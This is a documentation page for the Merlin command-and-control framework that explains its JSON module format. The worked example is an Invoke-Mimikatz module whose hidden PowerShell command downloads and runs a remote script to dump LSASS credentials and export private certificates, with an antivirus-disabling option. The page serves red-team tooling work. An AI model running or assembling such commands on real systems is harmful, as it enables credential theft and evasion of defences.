

<!DOCTYPE html>
<html class="writer-html5" lang="en" >
<head>
  <meta charset="utf-8">
  <meta name="generator" content="Docutils 0.19: https://docutils.sourceforge.io/" />

  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  
  <title>Building Modules &mdash; Merlin BETA documentation</title>
  

  
  <link rel="stylesheet" href="../_static/css/theme.css" type="text/css" />
  <link rel="stylesheet" href="../_static/pygments.css" type="text/css" />
  <link rel="stylesheet" href="../_static/pygments.css" type="text/css" />
  <link rel="stylesheet" href="../_static/css/theme.css" type="text/css" />

  
  
  
  

  
  <!--[if lt IE 9]>
    <script src="../_static/js/html5shiv.min.js"></script>
  <![endif]-->
  
    
      <script type="text/javascript" id="documentation_options" data-url_root="../" src="../_static/documentation_options.js"></script>
        <script data-url_root="../" id="documentation_options" src="../_static/documentation_options.js"></script>
        <script src="../_static/doctools.js"></script>
        <script src="../_static/sphinx_highlight.js"></script>
    
    <script type="text/javascript" src="../_static/js/theme.js"></script>

    
    <link rel="index" title="Index" href="../genindex.html" />
    <link rel="search" title="Search" href="../search.html" />
    <link rel="next" title="Blog Posts" href="../misc/blogs.html" />
    <link rel="prev" title="TLS Certificates" href="../server/x509.html" /> 
</head>

<body class="wy-body-for-nav">

   
  <div class="wy-grid-for-nav">
    
    <nav data-toggle="wy-nav-shift" class="wy-nav-side">
      <div class="wy-side-scroll">
        <div class="wy-side-nav-search" >
          

          
            <a href="../index.html" class="icon icon-home" alt="Documentation Home"> Merlin
          

          
          </a>

          
            
            
              <div class="version">
                0.8.0
              </div>
            
          

          
<div role="search">
  <form id="rtd-search-form" class="wy-form" action="../search.html" method="get">
    <input type="text" name="q" placeholder="Search docs" />
    <input type="hidden" name="check_keywords" value="yes" />
    <input type="hidden" name="area" value="default" />
  </form>
</div>

          
        </div>

        
        <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation">
          
            
            
              
            
            
              <p class="caption" role="heading"><span class="caption-text">Quick Start</span></p>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../quickStart/server.html">Merlin Server</a></li>
<li class="toctree-l1"><a class="reference internal" href="../quickStart/agent.html">Merlin Agent</a></li>
<li class="toctree-l1"><a class="reference internal" href="../quickStart/faq.html">FAQ</a></li>
</ul>
<p class="caption" role="heading"><span class="caption-text">Merlin Agent</span></p>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../agent/cli.html">Command Line Flags</a></li>
<li class="toctree-l1"><a class="reference internal" href="../agent/dll.html">DLL Agent</a></li>
<li class="toctree-l1"><a class="reference internal" href="../agent/custom.html">Custom Build</a></li>
</ul>
<p class="caption" role="heading"><span class="caption-text">Merlin Server</span></p>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../server/menu/main.html">Main Menu</a></li>
<li class="toctree-l1"><a class="reference internal" href="../server/menu/agents.html">Agent Menu</a></li>
<li class="toctree-l1"><a class="reference internal" href="../server/menu/listeners.html">Listener Menu</a></li>
<li class="toctree-l1"><a class="reference internal" href="../server/menu/modules.html">Modules Menu</a></li>
<li class="toctree-l1"><a class="reference internal" href="../server/x509.html">TLS Certificates</a></li>
</ul>
<p class="caption" role="heading"><span class="caption-text">Modules</span></p>
<ul class="current">
<li class="toctree-l1 current"><a class="current reference internal" href="#">Building Modules</a><ul>
<li class="toctree-l2"><a class="reference internal" href="#base">Base</a><ul>
<li class="toctree-l3"><a class="reference internal" href="#type">Type</a></li>
<li class="toctree-l3"><a class="reference internal" href="#remote-vs-local">Remote vs Local</a></li>
<li class="toctree-l3"><a class="reference internal" href="#options">Options</a><ul>
<li class="toctree-l4"><a class="reference internal" href="#name">Name</a></li>
<li class="toctree-l4"><a class="reference internal" href="#value">Value</a></li>
<li class="toctree-l4"><a class="reference internal" href="#flag">Flag</a></li>
</ul>
</li>
<li class="toctree-l3"><a class="reference internal" href="#commands">Commands</a></li>
</ul>
</li>
<li class="toctree-l2"><a class="reference internal" href="#powershell">Powershell</a></li>
</ul>
</li>
</ul>
<p class="caption" role="heading"><span class="caption-text">Misc.</span></p>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../misc/blogs.html">Blog Posts</a></li>
<li class="toctree-l1"><a class="reference internal" href="../misc/contrib.html">Contributing</a></li>
<li class="toctree-l1"><a class="reference internal" href="../misc/logging.html">Logging</a></li>
</ul>

            
          
        </div>
        
      </div>
    </nav>

    <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap">

      
      <nav class="wy-nav-top" aria-label="top navigation">
        
          <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
          <a href="../index.html">Merlin</a>
        
      </nav>


      <div class="wy-nav-content">
        
        <div class="rst-content">
        
          















<div role="navigation" aria-label="breadcrumbs navigation">

  <ul class="wy-breadcrumbs">
    
      <li><a href="../index.html" class="icon icon-home"></a> &raquo;</li>
        
      <li>Building Modules</li>
    
    
      <li class="wy-breadcrumbs-aside">
        
            
            <a href="../_sources/modules/build.rst.txt" rel="nofollow"> View page source</a>
          
        
      </li>
    
  </ul>

  
  <hr/>
</div>
          <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article">
           <div itemprop="articleBody">
            
  <section id="building-modules">
<h1>Building Modules<a class="headerlink" href="#building-modules" title="Permalink to this heading">¶</a></h1>
<p>Modules are used to perform a set of pre-defined actions or execute a program on an agent. The modules are described using JavaScript Object Notation (JSON). Modules will be stored in <code class="docutils literal notranslate"><span class="pre">platform/arch/language/type</span></code> directories. Every module <em>must</em> have the <code class="docutils literal notranslate"><span class="pre">base</span></code> object and <em>may</em> have additional objects. Examples of the module structures can be found in the <code class="docutils literal notranslate"><span class="pre">data/modules/templates</span></code> directory. All keys used when describing a module will be lowercase (i.e. name and NOT Name).</p>
<section id="base">
<h2>Base<a class="headerlink" href="#base" title="Permalink to this heading">¶</a></h2>
<p>The <code class="docutils literal notranslate"><span class="pre">base</span></code> module is required and is the lowest level of describing a module and its function.</p>
<table class="docutils align-default" id="id7">
<caption><span class="caption-text">Module Base</span><a class="headerlink" href="#id7" title="Permalink to this table">¶</a></caption>
<thead>
<tr class="row-odd"><th class="head"><p>Name</p></th>
<th class="head"><p>Type</p></th>
<th class="head"><p>Description</p></th>
<th class="head"><p>Example</p></th>
</tr>
</thead>
<tbody>
<tr class="row-even"><td><p><a class="reference internal" href="#type">type</a></p></td>
<td><p>string</p></td>
<td><p><code class="docutils literal notranslate"><span class="pre">standard</span></code> or <code class="docutils literal notranslate"><span class="pre">extended</span></code></p></td>
<td><p>“type”: “standard”</p></td>
</tr>
<tr class="row-odd"><td><p>name</p></td>
<td><p>string</p></td>
<td><p>The name of the module</p></td>
<td><p>“name”: “MyModuleName”</p></td>
</tr>
<tr class="row-even"><td><p>author</p></td>
<td><p>array of strings</p></td>
<td><p>A list of the module’s authors</p></td>
<td><p>“author”: [“Russel Van Tuyl (&#64;Ne0ndog)”]</p></td>
</tr>
<tr class="row-odd"><td><p>credits</p></td>
<td><p>array of strings</p></td>
<td><p>A list of authors to credit original work leveraged in the module</p></td>
<td><p>“credits”: [“Joe Bialek (&#64;JosephBialek)”, “Benjamin Delpy (&#64;gentilkiwi)”]</p></td>
</tr>
<tr class="row-even"><td><p>path</p></td>
<td><p>array of strings</p></td>
<td><p>The file path to the module</p></td>
<td><p>“path”: [“C”, “windows”, “system32”]</p></td>
</tr>
<tr class="row-odd"><td><p>platform</p></td>
<td><p>string</p></td>
<td><p>The target platform the module can run on</p></td>
<td><p>“platform”: “linux”</p></td>
</tr>
<tr class="row-even"><td><p>arch</p></td>
<td><p>string</p></td>
<td><p>The target architecture the module can run on</p></td>
<td><p>“arch”: “x64”</p></td>
</tr>
<tr class="row-odd"><td><p>lang</p></td>
<td><p>string</p></td>
<td><p>The target language the module leverages</p></td>
<td><p>“lang”: “powershell” or “lang”: “bash”</p></td>
</tr>
<tr class="row-even"><td><p>privilege</p></td>
<td><p>bool</p></td>
<td><p>Does the module require elevated privileges?</p></td>
<td><p>“privilege”: true</p></td>
</tr>
<tr class="row-odd"><td><p>notes</p></td>
<td><p>string</p></td>
<td><p>Miscellaneous notes about the module</p></td>
<td><p>“notes”: “This module doesn’t work well on Ubuntu 14.04”</p></td>
</tr>
<tr class="row-even"><td><p><a class="reference internal" href="#remote">remote</a></p></td>
<td><p>string</p></td>
<td><p>The remote path where the script associated with the module can be found</p></td>
<td><p>“remote”: “<a class="reference external" href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1">https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1</a>”</p></td>
</tr>
<tr class="row-odd"><td><p><a class="reference internal" href="#local">local</a></p></td>
<td><p>array of strings</p></td>
<td><p>The local file system path where the script associated with the module can be found</p></td>
<td><p>“local”: [“data”, “src”, “PowerSploit”, “Exfiltration”, “Invoke-Mimikatz.ps1”]</p></td>
</tr>
<tr class="row-even"><td><p><a class="reference internal" href="#options">options</a></p></td>
<td><p>array of objects</p></td>
<td><p>The configurable options for the module</p></td>
<td><p>“options”: [{“name”: “DumpCreds”, “value”: “true”, “required”: false, “description”:”[Switch]Use mimikatz to dump credentials out of LSASS.”}]</p></td>
</tr>
<tr class="row-odd"><td><p>description</p></td>
<td><p>string</p></td>
<td><p>A description of the module and its function</p></td>
<td><p>“description”: “this script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory.”</p></td>
</tr>
<tr class="row-even"><td><p><a class="reference internal" href="#commands">commands</a></p></td>
<td><p>array of strings</p></td>
<td><p>A list of the commands to be executed on the host when running the script</p></td>
<td><p>“commands”: [“powershell.exe”, “-nop”, “-w”, “0”, “\\”IEX (New-Object Net.WebClient).DownloadString(’<a class="reference external" href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1">https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1</a>’);”,”Invoke-Mimikatz”, “{{DumpCreds.Flag}}”, “{{DumpCerts.Flag}}”, “{{Command}}”, “{{ComputerName}}”,”\\””]</p></td>
</tr>
</tbody>
</table>
<p>Full Example:</p>
<div class="highlight-json notranslate"><div class="highlight"><pre><span></span><span class="p">{</span>
<span class="w">  </span><span class="nt">&quot;base&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w">    </span><span class="nt">&quot;type&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;standard&quot;</span><span class="p">,</span>
<span class="w">    </span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;Invoke-Mimikatz&quot;</span><span class="p">,</span>
<span class="w">    </span><span class="nt">&quot;author&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">&quot;Russel Van Tuyl (@Ne0nd0g)&quot;</span><span class="p">],</span>
<span class="w">    </span><span class="nt">&quot;credits&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">&quot;Joe Bialek (@JosephBialek)&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;Benjamin Delpy (@gentilkiwi)&quot;</span><span class="p">],</span>
<span class="w">    </span><span class="nt">&quot;path&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">&quot;windows&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;x64&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;powershell&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;powersploit&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;Invoke-Mimikatz.json&quot;</span><span class="p">],</span>
<span class="w">    </span><span class="nt">&quot;platform&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;windows&quot;</span><span class="p">,</span>
<span class="w">    </span><span class="nt">&quot;arch&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;x64&quot;</span><span class="p">,</span>
<span class="w">    </span><span class="nt">&quot;lang&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;PowerShell&quot;</span><span class="p">,</span>
<span class="w">    </span><span class="nt">&quot;privilege&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span>
<span class="w">    </span><span class="nt">&quot;notes&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;This is part of the PowerSploit project https://github.com/PowerShellMafia/PowerSploit&quot;</span><span class="p">,</span>
<span class="w">    </span><span class="nt">&quot;remote&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1&quot;</span><span class="p">,</span>
<span class="w">    </span><span class="nt">&quot;local&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">&quot;data&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;src&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;PowerSploit&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;Exfiltration&quot;</span><span class="p">,</span><span class="w"> </span><span class="s2">&quot;Invoke-Mimikatz.ps1&quot;</span><span class="p">],</span>
<span class="w">    </span><span class="nt">&quot;options&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w">      </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;DumpCreds&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;true&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;-DumpCreds&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="s2">&quot;[Switch]Use mimikatz to dump credentials out of LSASS.&quot;</span><span class="p">},</span>
<span class="w">      </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;DumpCerts&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;-DumpCerts&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="s2">&quot;[Switch]Use mimikatz to export all private certificates (even if they are marked non-exportable).&quot;</span><span class="p">},</span>
<span class="w">      </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;Command&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;-Command&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="s2">&quot;Supply mimikatz a custom command line. This works exactly the same as running the mimikatz executable like this: mimikatz \&quot;privilege::debug exit\&quot; as an example.&quot;</span><span class="p">},</span>
<span class="w">      </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;ComputerName&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;-ComputerName&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="s2">&quot;Optional, an array of computernames to run the script on.&quot;</span><span class="p">}</span>
<span class="w">    </span><span class="p">],</span>
<span class="w">    </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the mimikatz binary to disk. The script has a ComputerName parameter which allows it to be executed against multiple computers. This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.&quot;</span><span class="p">,</span>
<span class="w">    </span><span class="nt">&quot;commands&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w">      </span><span class="s2">&quot;powershell.exe&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;-nop&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;-w 0&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;\&quot;IEX (New-Object Net.WebClient).DownloadString(&#39;https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1&#39;);&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;Invoke-Mimikatz&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;{{DumpCreds.Flag}}&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;{{DumpCerts.Flag}}&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;{{Command}}&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;{{ComputerName}}&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;\&quot;&quot;</span>
<span class="w">    </span><span class="p">]</span>
<span class="w">  </span><span class="p">},</span>
<span class="w">  </span><span class="nt">&quot;powershell&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w">    </span><span class="nt">&quot;disableav&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span>
<span class="w">    </span><span class="nt">&quot;obfuscate&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span>
<span class="w">    </span><span class="nt">&quot;base64&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span>
<span class="w">  </span><span class="p">}</span>
<span class="p">}</span>
</pre></div>
</div>
<section id="type">
<span id="id1"></span><h3>Type<a class="headerlink" href="#type" title="Permalink to this heading">¶</a></h3>
<p>Modules can be either <code class="docutils literal notranslate"><span class="pre">standard</span></code> or <code class="docutils literal notranslate"><span class="pre">extended</span></code>.</p>
<p>A <strong>STANDARD</strong> module does not leverage any Go packages or functions
from the <cite>pkg/modules</cite> directory. Standard modules are best used to run a single command, or a series of commands, that
leverage functionality and programs on the host where the agent is running. The
<code class="docutils literal notranslate"><span class="pre">data/modules/linux/x64/bash/exec/bash.json</span></code> module is a standard module that takes a <code class="docutils literal notranslate"><span class="pre">Command</span></code> argument that is
subsequently run in <code class="docutils literal notranslate"><span class="pre">bash</span> <span class="pre">-c</span> <span class="pre">{{Command}}</span></code>. This could be useful to abstract out command line arguments with easy to set
options or to run a single command across all agents using <code class="docutils literal notranslate"><span class="pre">set</span> <span class="pre">Agent</span> <span class="pre">all</span></code> while in the module’s prompt.</p>
<p>An <strong>EXTENDED</strong> module DOES leverage code from an associated package <code class="docutils literal notranslate"><span class="pre">pkg/modules</span></code>. The sRDI module
at <code class="docutils literal notranslate"><span class="pre">data/modules/windows/x64/go/exec/sRDI.json</span></code> is an example of an extended module that uses exported functions from
the srdi package at <code class="docutils literal notranslate"><span class="pre">pkg/modules/srdi/srdi.go</span></code>. This extended module reads in a Windows DLL and returns shellcode that
will be executed on the agent. The extended function’s code must be located in <code class="docutils literal notranslate"><span class="pre">pkg/modules/&lt;function&gt;</span></code>.
The extended function’s code must expose a <code class="docutils literal notranslate"><span class="pre">Parse()</span></code> function that returns an array of strings that contain commands for
the agent to interpret. Extended function must be programmed into the <code class="docutils literal notranslate"><span class="pre">getExtendedCommand()</span></code> function in <code class="docutils literal notranslate"><span class="pre">modules.go</span></code>
and point to the module’s exported <code class="docutils literal notranslate"><span class="pre">Parse()</span></code> function.</p>
</section>
<section id="remote-vs-local">
<span id="local"></span><span id="remote"></span><h3>Remote vs Local<a class="headerlink" href="#remote-vs-local" title="Permalink to this heading">¶</a></h3>
<p>When the module leverages a script, it can be accessed with <em>either</em> the <code class="docutils literal notranslate"><span class="pre">local</span></code> or <code class="docutils literal notranslate"><span class="pre">remote</span></code> values of the base module. The <code class="docutils literal notranslate"><span class="pre">local</span></code> specifies the file path on the server where the script can be found. Merlin <em>DOES NOT</em> ship with scripts. However, they should be copied to the <code class="docutils literal notranslate"><span class="pre">data/source</span></code> directory using something like Git. For example, you move into the <code class="docutils literal notranslate"><span class="pre">data/source</span></code> direct and do a <code class="docutils literal notranslate"><span class="pre">git</span> <span class="pre">clone</span> <span class="pre">https://github.com/PowerShellMafia/PowerSploit.git</span></code>. When the <code class="docutils literal notranslate"><span class="pre">local</span></code> source is used, the script is uploaded to the target from the server. When the <code class="docutils literal notranslate"><span class="pre">remote</span></code> source is used, the script is downloaded from that location to the target.</p>
</section>
<section id="options">
<span id="id2"></span><h3>Options<a class="headerlink" href="#options" title="Permalink to this heading">¶</a></h3>
<p>The <code class="docutils literal notranslate"><span class="pre">options</span></code> uses a special data type that requires five parts.</p>
<div class="highlight-json notranslate"><div class="highlight"><pre><span></span><span class="p">{</span>
<span class="w">    </span><span class="nt">&quot;options&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w">        </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;host&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;google.com&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;The host to ping&quot;</span><span class="p">},</span>
<span class="w">        </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;count&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;3&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;-c&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;Stop after sending count ECHO_REQUEST packets.&quot;</span><span class="p">},</span>
<span class="w">        </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;help&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;true&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;-h&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;Show help.&quot;</span><span class="p">}</span>
<span class="w">    </span><span class="p">]</span>
<span class="p">}</span>
</pre></div>
</div>
<table class="docutils align-default" id="id8">
<caption><span class="caption-text">Module Base</span><a class="headerlink" href="#id8" title="Permalink to this table">¶</a></caption>
<thead>
<tr class="row-odd"><th class="head"><p>Name</p></th>
<th class="head"><p>Type</p></th>
<th class="head"><p>Description</p></th>
<th class="head"><p>Example</p></th>
</tr>
</thead>
<tbody>
<tr class="row-even"><td><p>name</p></td>
<td><p>string</p></td>
<td><p>The name of the option</p></td>
<td><p>“name”: “ComputerName”</p></td>
</tr>
<tr class="row-odd"><td><p>value</p></td>
<td><p>string</p></td>
<td><p>The configured value for the option</p></td>
<td><p>“value”: “127.0.0.1”</p></td>
</tr>
<tr class="row-even"><td><p>required</p></td>
<td><p>bool</p></td>
<td><p>Is this option required?</p></td>
<td><p>“required”: false</p></td>
</tr>
<tr class="row-odd"><td><p>flag</p></td>
<td><p>string</p></td>
<td><p>The command line flag for the option</p></td>
<td><p>“flag”: “-ComputerName”</p></td>
</tr>
<tr class="row-even"><td><p>description</p></td>
<td><p>string</p></td>
<td><p>A short description of the option</p></td>
<td><p>“description”: “The target computer name to run the script on”</p></td>
</tr>
</tbody>
</table>
<section id="name">
<span id="id3"></span><h4>Name<a class="headerlink" href="#name" title="Permalink to this heading">¶</a></h4>
<p>This is the name of the option that can be set by a user. This value is used as a variable in the <code class="docutils literal notranslate"><span class="pre">commands</span></code> section of the module file. The name is case sensitive (<code class="docutils literal notranslate"><span class="pre">Name</span></code> != <code class="docutils literal notranslate"><span class="pre">name</span></code> != <code class="docutils literal notranslate"><span class="pre">NAME</span></code>). An example option object looks like:</p>
<div class="highlight-json notranslate"><div class="highlight"><pre><span></span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;count&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;3&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;-c&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;Stop after sending count ECHO_REQUEST packets.&quot;</span><span class="p">}</span>
</pre></div>
</div>
<p>An example of setting the <code class="docutils literal notranslate"><span class="pre">count</span></code> option is:</p>
<div class="highlight-html notranslate"><div class="highlight"><pre><span></span>Merlin[module][TEST]» set count 5
[+]count set to 5
Merlin[module][TEST]»
</pre></div>
</div>
<p>Using just the option’s name within double curly braces will return both the flag and value. For example <code class="docutils literal notranslate"><span class="pre">{{count}}</span></code> would be parsed and replaced with <code class="docutils literal notranslate"><span class="pre">-c</span> <span class="pre">3</span></code>. The <code class="docutils literal notranslate"><span class="pre">flag</span></code> and <code class="docutils literal notranslate"><span class="pre">value</span></code> properties can be accessed individually if needed with <code class="docutils literal notranslate"><span class="pre">{{count.Flag}}</span></code> and <code class="docutils literal notranslate"><span class="pre">{{count.Value}}</span></code>.</p>
</section>
<section id="value">
<span id="id4"></span><h4>Value<a class="headerlink" href="#value" title="Permalink to this heading">¶</a></h4>
<p>This is the value that the options has been set to. The value can be directly accessed in the <code class="docutils literal notranslate"><span class="pre">commands</span></code> section by
using <code class="docutils literal notranslate"><span class="pre">.Value</span></code> after option’s name. This is ideal for positional arguments that do not have a flag or specify an
application executable file name. An example option object that uses the <code class="docutils literal notranslate"><span class="pre">value</span></code> property is:</p>
<div class="highlight-json notranslate"><div class="highlight"><pre><span></span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;host&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;google.com&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;The host to ping&quot;</span><span class="p">}</span>
</pre></div>
</div>
<p>For example <code class="docutils literal notranslate"><span class="pre">{{host.Value}}</span></code> would be parsed and replaced with just the value of the <code class="docutils literal notranslate"><span class="pre">host</span></code> option (<code class="docutils literal notranslate"><span class="pre">google.com</span></code>).</p>
<p>If an option’s value is empty, it will not be ignored and not parsed.</p>
</section>
<section id="flag">
<span id="id5"></span><h4>Flag<a class="headerlink" href="#flag" title="Permalink to this heading">¶</a></h4>
<p>The <code class="docutils literal notranslate"><span class="pre">flag</span></code> property is used to specify what the notation is for a specific argument when executing a command.
The <code class="docutils literal notranslate"><span class="pre">name</span></code> property can be used in conjunction with the <code class="docutils literal notranslate"><span class="pre">flag</span></code> property when the flag is not descriptive enough to make
sense. A command line flag could start with a variety of options like <code class="docutils literal notranslate"><span class="pre">-</span></code>, <code class="docutils literal notranslate"><span class="pre">--</span></code>, or <code class="docutils literal notranslate"><span class="pre">/</span></code>. An example option object that
uses a <code class="docutils literal notranslate"><span class="pre">flag</span></code> property is:</p>
